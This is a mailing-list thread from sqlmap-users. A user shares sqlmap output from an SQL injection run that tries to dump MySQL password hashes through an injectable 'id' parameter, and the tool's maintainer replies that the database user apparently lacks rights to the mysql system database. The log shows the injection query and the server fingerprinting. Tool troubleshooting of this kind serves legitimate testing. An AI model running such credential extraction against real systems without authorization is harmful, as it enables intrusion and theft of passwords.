sqlmap-users

[sqlmap-users] problem using --passwords option

[Adi M. <adi...@ya...>]

This is the output I got:

[08:54:02] [INFO] resuming match ratio '0.9' from session file
[08:54:02] [INFO] resuming injection point 'GET' from session file
[08:54:02] [INFO] resuming injection parameter 'id' from session file
[08:54:02] [INFO] resuming injection type 'numeric' from session file
[08:54:02] [INFO] resuming 0 number of parenthesis from session file
[08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:54:02] [INFO] resuming union comment '#' from session file
[08:54:02] [INFO] resuming union count 9 from session file
[08:54:02] [INFO] resuming union position 4 from session file
[08:54:02] [INFO] testing connection to the target url
[08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[08:54:02] [INFO] testing for parenthesis on injectable parameter
[08:54:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
[08:54:02] [INFO] fetching database users password hashes
[08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli
[08:54:03] [INFO] fetching database users
[08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
[08:54:03] [INFO] fetching number of password hashes for user '''
[08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()''
[*] shutting down at: 08:54:03


      

Re: [sqlmap-users] problem using --passwords option

[Bernardo D. A. G. <ber...@gm...>]

It seems that the user 'fmcgman' has not access to read the 'mysql'
system database.

On Mon, Oct 5, 2009 at 06:59, Adi Mutu <adi...@ya...> wrote:
>
> This is the output I got:
>
> [08:54:02] [INFO] resuming match ratio '0.9' from session file
> [08:54:02] [INFO] resuming injection point 'GET' from session file
> [08:54:02] [INFO] resuming injection parameter 'id' from session file
> [08:54:02] [INFO] resuming injection type 'numeric' from session file
> [08:54:02] [INFO] resuming 0 number of parenthesis from session file
> [08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [08:54:02] [INFO] resuming union comment '#' from session file
> [08:54:02] [INFO] resuming union count 9 from session file
> [08:54:02] [INFO] resuming union position 4 from session file
> [08:54:02] [INFO] testing connection to the target url
> [08:54:02] [WARNING] the testable parameter 'id' you provided is not into
> the Cookie
> [08:54:02] [INFO] testing for parenthesis on injectable parameter
> [08:54:02] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Red Hat
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5
> [08:54:02] [INFO] fetching database users password hashes
> [08:54:03] [WARNING] for some reasons it was not possible to retrieve the
> query output through inband SQL injection technique, sqlmap is going bli
> [08:54:03] [INFO] fetching database users
> [08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
> [08:54:03] [INFO] fetching number of password hashes for user '''
> [08:54:03] [ERROR] Unenclosed ' in 'SELECT
> IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM
> mysql.user WHERE user=CHAR()''
> [*] shutting down at: 08:54:03
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry® Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9-12, 2009. Register now!
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F